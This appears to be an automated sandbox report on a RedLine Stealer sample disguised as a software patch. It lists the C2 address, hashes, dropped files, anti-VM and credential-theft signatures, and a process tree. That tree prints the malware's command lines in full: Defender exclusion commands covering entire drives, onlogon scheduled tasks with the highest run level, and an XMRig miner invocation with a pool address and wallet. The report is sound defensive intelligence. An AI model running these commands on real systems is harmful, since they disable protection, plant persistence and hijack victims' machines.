Analysis
- max time kernel: 153s
- max time network: 164s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 28-10-2021 16:15

Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: Software patch by Silensix.exe
  Resource: win7-en-20210920
General
- Target: Software patch by Silensix.exe
- Size: 3.0MB
- MD5: 1f1d67844ed54e1f03355f57ba8b17fc
- SHA1: 248262da44662b7347ff6de745ac498ca7984e88
- SHA256: f2f1cba015211deb613359de61bc4bed08c9ccf1af7b9af89d73aaa1f4da6d42
- SHA512: 9714f8fbd1533b54f4fbff6da24ba322e6f49ac47bc1a83d336424fb31cbd0f6b0bff8139f4ca9a13706593fbe288f89a9f74103a364fd56e13869dc32bde73d
Malware Config
Extracted
- Family: redline
- Botnet: Youtube
- C2: 185.203.240.16:1249
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (2 IoCs)
  resource / yara_rule:
  behavioral2/memory/3720-140-0x0000000000400000-0x0000000000420000-memory.dmp family_redline
  behavioral2/memory/3720-141-0x0000000000418D32-mapping.dmp family_redline
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
- XMRig Miner Payload (2 IoCs)
  resource / yara_rule:
  behavioral2/memory/3916-537-0x000000014030F3F8-mapping.dmp xmrig
  behavioral2/memory/3916-549-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
- Downloads MZ/PE file
- Executes dropped EXE (8 IoCs)
  pid / process:
  3748 Datafile32.exe
  432 Datafile64.exe
  3024 Server32.exe
  3720 Server32.exe
  3592 services32.exe
  1544 services64.exe
  3464 sihost32.exe
  3320 sihost64.exe
- Checks BIOS information in registry (2 TTPs, 6 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description / ioc / process:
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (services64.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Software patch by Silensix.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Software patch by Silensix.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Datafile64.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Datafile64.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (services64.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Processes:
  resource / yara_rule:
  behavioral2/memory/3584-118-0x0000000000EC0000-0x0000000000EC1000-memory.dmp themida
  C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida
  C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida
  behavioral2/memory/432-131-0x0000000000400000-0x0000000000EAE000-memory.dmp themida
  C:\Windows\System32\services64.exe themida
  C:\Windows\system32\services64.exe themida
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Checks whether UAC is enabled
  description / ioc / process:
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Software patch by Silensix.exe)
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Datafile64.exe)
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (services64.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
- Drops file in System32 directory (4 IoCs)
  description / ioc / process:
  File created C:\Windows\system32\services64.exe (conhost.exe)
  File opened for modification C:\Windows\system32\services64.exe (conhost.exe)
  File created C:\Windows\system32\Microsoft\Libs\sihost64.exe (conhost.exe)
  File created C:\Windows\system32\Microsoft\Libs\WR64.sys (conhost.exe)
- Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
  pid / process:
  3584 Software patch by Silensix.exe
  432 Datafile64.exe
  1544 services64.exe
- Suspicious use of SetThreadContext (2 IoCs)
  description / pid / process / target process:
  PID 3024 (Server32.exe) set thread context of 3720 (Server32.exe)
  PID 2492 (conhost.exe) set thread context of 3916 (nslookup.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / process:
  3776 schtasks.exe
  1628 schtasks.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / process (repeated rows collapsed, count in parentheses):
  2732 conhost.exe
  3932 powershell.exe (x3)
  3960 powershell.exe (x3)
  3720 Server32.exe
  1340 conhost.exe
  508 powershell.exe (x3)
  1016 powershell.exe (x3)
  3672 conhost.exe (x2)
  1456 powershell.exe (x3)
  3104 powershell.exe (x3)
  2492 conhost.exe (x2)
  1720 powershell.exe (x3)
  608 powershell.exe (x3)
  3916 nslookup.exe (x33)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid / process: tokens (grouped by process, in report order):
  3584 Software patch by Silensix.exe: SeDebugPrivilege
  2732 conhost.exe: SeDebugPrivilege
  3932 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3960 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3720 Server32.exe: SeDebugPrivilege
  1340 conhost.exe: SeDebugPrivilege
  508 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  pid / process -> target pid / target process (repeated rows collapsed, count in parentheses):
  3584 Software patch by Silensix.exe -> 3748 Datafile32.exe (x2)
  3584 Software patch by Silensix.exe -> 432 Datafile64.exe (x2)
  3584 Software patch by Silensix.exe -> 3024 Server32.exe (x3)
  3024 Server32.exe -> 3720 Server32.exe (x8)
  3748 Datafile32.exe -> 2732 conhost.exe (x3)
  2732 conhost.exe -> 1780 cmd.exe (x2)
  1780 cmd.exe -> 3932 powershell.exe (x2)
  2732 conhost.exe -> 2112 cmd.exe (x2)
  2112 cmd.exe -> 3776 schtasks.exe (x2)
  1780 cmd.exe -> 3960 powershell.exe (x2)
  432 Datafile64.exe -> 1340 conhost.exe (x3)
  1340 conhost.exe -> 2776 cmd.exe (x2)
  2776 cmd.exe -> 508 powershell.exe (x2)
  1340 conhost.exe -> 3012 cmd.exe (x2)
  3012 cmd.exe -> 1628 schtasks.exe (x2)
  2732 conhost.exe -> 3692 cmd.exe (x2)
  3692 cmd.exe -> 3592 services32.exe (x2)
  2776 cmd.exe -> 1016 powershell.exe (x2)
  1340 conhost.exe -> 3720 cmd.exe (x2)
  3720 cmd.exe -> 1544 services64.exe (x2)
  3592 services32.exe -> 3672 conhost.exe (x3)
  3672 conhost.exe -> 1700 cmd.exe (x2)
  1700 cmd.exe -> 1456 powershell.exe (x2)
  3672 conhost.exe -> 3464 sihost32.exe (x2)
  1700 cmd.exe -> 3104 powershell.exe (x2)
  3464 sihost32.exe -> 2812 conhost.exe (x3)
  1544 services64.exe -> 2492 conhost.exe (x1)
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe (tree depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe (tree depth 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe (tree depth 3)
  Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe (tree depth 4)
  Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 5)
  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 5)
  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (tree depth 4)
  Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe (tree depth 5)
  Command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe (tree depth 4)
  Command line: "cmd" cmd /c "C:\Users\Admin\services32.exe"
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exe (tree depth 5)
  Command line: C:\Users\Admin\services32.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe (tree depth 6)
  Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe (tree depth 7)
  Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 8)
  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 8)
  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (tree depth 7)
  Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe (tree depth 8)
  Command line: "C:\Windows\System32\\conhost.exe" "/sihost32"
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe (tree depth 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe (tree depth 3)
  Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe (tree depth 4)
  Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 5)
  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 5)
  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe (tree depth 4)
  Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe (tree depth 5)
  Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe (tree depth 4)
  Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exe (tree depth 5)
  Command line: C:\Windows\system32\services64.exe
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe (tree depth 6)
  Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe (tree depth 7)
  Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 8)
  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 8)
  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe (tree depth 7)
  Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe (tree depth 8)
  Command line: "C:\Windows\System32\conhost.exe" "/sihost64"
-
C:\Windows\System32\nslookup.exe (tree depth 7)
  Command line: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="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" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe (tree depth 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe (tree depth 3)
  Command line: C:\Users\Admin\AppData\Local\Temp\Server32.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: ad5cd538ca58cb28ede39c108acb5785
  SHA1: 1ae910026f3dbe90ed025e9e96ead2b5399be877
  SHA256: c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
  SHA512: c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.log
  MD5: 41fbed686f5700fc29aaccf83e8ba7fd
  SHA1: 5271bc29538f11e42a3b600c8dc727186e912456
  SHA256: df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
  SHA512: 234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 91e6681b0d95b11a838130edb5f35b24
  SHA1: 2ffb3d6f985b26691ca7a607429d7364d63d1f9c
  SHA256: 52a50b063681d372d9dce2d5791fa686f6b686fb2f3d313c267a24ea322054b2
  SHA512: f819c2196b5a78a98f857d4d13d39c3f36c5690c51162d03fd771b1bf42d96b305ddec2ea6d3e69ce0dbf0c8027018e57e99f8eb7730924aa2e07c62cb19c5cb
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 5565930ffc45d8bf06e27d891141efe3
  SHA1: 4eb34e7ea219a5a00cc2aeec884c6ddef5176c69
  SHA256: ca05e17ed2819c89aef66ba0a44b07e2fcbf370dbdc708ccaea939c950a0e170
  SHA512: 1e72f4d6ac0917a15e8cecf6513711e05fb2f1d86482e3008be3994ddf3a98295c2bc724993639b80880fa3bb1ba6652727d16fbac13d8d1968136b177ad721b
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 0b29e98dc4e29fe2af07a0525f14c604
  SHA1: 0d36d14f7abd0ef596af3cb81457aa800fbe1c70
  SHA256: eded72d74005df8d664fa9d5c92dc55a9de02b1728eef5c50dffc8100d4f5478
  SHA512: 193cc8133485311a1340395e37024548052dbe6f7e107da83273a240dd371cc319fff700183e2d0c0043cdc4f017b33536e8c39d0b89fb39c68478eca1e08e37
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: c87c731d787f17684f3f6705ebe2bc2d
  SHA1: ea5420e682872dd007a692a9f5f554af5e699cf9
  SHA256: fec8067989fc090844be1cc76fcad9e881fe26bd6d8ca4486e7c95e85bd8ed68
  SHA512: b1ed39240c4af5824b7fd4d15b4dd26ee172e62faa4845a9446ba5c9a0e38934ce66179bcbf9b88336916eee91b96c7cf899165b2c6794e11cdfdb4f9308a76b
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 40c119ce7e076979501ba6dde896dde5
  SHA1: 59a8348b212942ea170879388653ba0e846e49e3
  SHA256: fa9abe9d3adc004a51e6d0b14adb25dc051396a0bac1e3598b6cd174d59f67d2
  SHA512: 8e18c54f945685d44b10c3eef1eb4fc65eda2c854ddab97088b184cd5823fb5edf99544a896f196e6f5e8cb12eeed3cd4e305c426ad08f3349d7c2961a98ba79
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: c45206334353fa6d36cf7be73d24b428
  SHA1: 4ac808b000d092063a024dd591237d2b5ed4ffda
  SHA256: 2676ec5c84a196a6caf37b444b58af7853fb23fc0099ae23e6d9125592a995e7
  SHA512: c225f3c1f2f06eb82ac9c39274a048c69e6adc494d837030f6c979530220b64e24396dae268c0415dcfd3b536ead0a2d923bfb17c2cb42f581bcd17b25d2e30a
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: b9432cddea4cf0cffa0af13340fcb081
  SHA1: c421a0a2cbbe2caead98a022cdd26255c46459a0
  SHA256: 81310be9b4274793fab4f6517b72aa57ffc26ed7f9d209a757c6ae64fe2f35d5
  SHA512: 856d084da7f9db0f69af85bca2890a2344a1e1961ebc4d79992c11e76f3b5729bb03a69190684c0dc6ba334c700dd2522658e928ce7652ac5aad2dbd913ba132
- C:\Users\Admin\AppData\Local\Temp\Datafile32.exe (listed twice in the report, identical hashes)
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
- C:\Users\Admin\AppData\Local\Temp\Datafile64.exe (listed twice in the report, identical hashes)
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
- C:\Users\Admin\AppData\Local\Temp\Server32.exe (listed three times in the report, identical hashes)
  MD5: 28df282142e714ecdf4bf289ba6dff99
  SHA1: 2c864ec9a55d1454b5260a1f31d4e21e586c24fc
  SHA256: 0c18d8cdda403affefb632137b7308a178f0c1d60818285a1d98436ab6f394fd
  SHA512: 0178748243957b1f531dbb9dacbed6f9b1b19abcb7a00baebea73843c7d8a36bad99add5f727c99e7f7320dd0a73a0de7544a2af68589d4f5244b471e62764b8
- C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (listed twice in the report, identical hashes)
  MD5: a48e4ecd100871e98f3b6128f9b37187
  SHA1: 8adf645a05d8ede551aadaaf51a37a47071497b9
  SHA256: b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
  SHA512: bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
- C:\Users\Admin\services32.exe (listed twice in the report, identical hashes; same hashes as Datafile32.exe)
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
- C:\Windows\System32\Microsoft\Libs\sihost64.exe
  MD5: ab0e8cd9d9374369b972868842a74471
  SHA1: d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256: 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512: 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
- C:\Windows\System32\services64.exe (same hashes as Datafile64.exe)
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
- C:\Windows\system32\Microsoft\Libs\sihost64.exe
  MD5: ab0e8cd9d9374369b972868842a74471
  SHA1: d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256: 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512: 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
- C:\Windows\system32\services64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
Memory dumps
- memory/432-124-0x0000000000000000-mapping.dmp
- memory/432-129-0x0000000000401000-0x0000000000403000-memory.dmp, Filesize: 8KB
- memory/432-131-0x0000000000400000-0x0000000000EAE000-memory.dmp, Filesize: 10.7MB
- memory/508-265-0x0000000000000000-mapping.dmp
- memory/508-320-0x000002A4AA138000-0x000002A4AA139000-memory.dmp, Filesize: 4KB
- memory/508-281-0x000002A4AA136000-0x000002A4AA138000-memory.dmp, Filesize: 8KB
- memory/508-284-0x000002A4AA130000-0x000002A4AA132000-memory.dmp, Filesize: 8KB
- memory/508-287-0x000002A4AA133000-0x000002A4AA135000-memory.dmp, Filesize: 8KB
- memory/608-553-0x0000000000000000-mapping.dmp
- memory/608-559-0x000002D5E62F0000-0x000002D5E62F2000-memory.dmp, Filesize: 8KB
- memory/608-593-0x000002D5E62F8000-0x000002D5E62F9000-memory.dmp, Filesize: 4KB
- memory/608-560-0x000002D5E62F3000-0x000002D5E62F5000-memory.dmp, Filesize: 8KB
- memory/608-574-0x000002D5E62F6000-0x000002D5E62F8000-memory.dmp, Filesize: 8KB
- memory/684-604-0x000001D54B5A0000-0x000001D54B5A2000-memory.dmp, Filesize: 8KB
- memory/684-603-0x000001D530EE0000-0x000001D530EE6000-memory.dmp, Filesize: 24KB
- memory/684-606-0x000001D54B5A6000-0x000001D54B5A7000-memory.dmp, Filesize: 4KB
- memory/684-605-0x000001D54B5A3000-0x000001D54B5A5000-memory.dmp, Filesize: 8KB
- memory/1016-352-0x000001AACBBD6000-0x000001AACBBD8000-memory.dmp, Filesize: 8KB
- memory/1016-353-0x000001AACBBD8000-0x000001AACBBD9000-memory.dmp, Filesize: 4KB
- memory/1016-315-0x0000000000000000-mapping.dmp
- memory/1016-322-0x000001AACBBD0000-0x000001AACBBD2000-memory.dmp, Filesize: 8KB
- memory/1016-323-0x000001AACBBD3000-0x000001AACBBD5000-memory.dmp, Filesize: 8KB
- memory/1340-280-0x00000205E9523000-0x00000205E9525000-memory.dmp, Filesize: 8KB
- memory/1340-279-0x00000205E9520000-0x00000205E9522000-memory.dmp, Filesize: 8KB
- memory/1340-283-0x00000205E9526000-0x00000205E9527000-memory.dmp, Filesize: 4KB
- memory/1340-278-0x00000205E6CD0000-0x00000205E6EF2000-memory.dmp, Filesize: 2.1MB
- memory/1456-429-0x000001EAF0593000-0x000001EAF0595000-memory.dmp, Filesize: 8KB
- memory/1456-430-0x000001EAF0596000-0x000001EAF0598000-memory.dmp, Filesize: 8KB
- memory/1456-428-0x000001EAF0590000-0x000001EAF0592000-memory.dmp, Filesize: 8KB
- memory/1456-373-0x0000000000000000-mapping.dmp
- memory/1456-446-0x000001EAF0598000-0x000001EAF0599000-memory.dmp, Filesize: 4KB
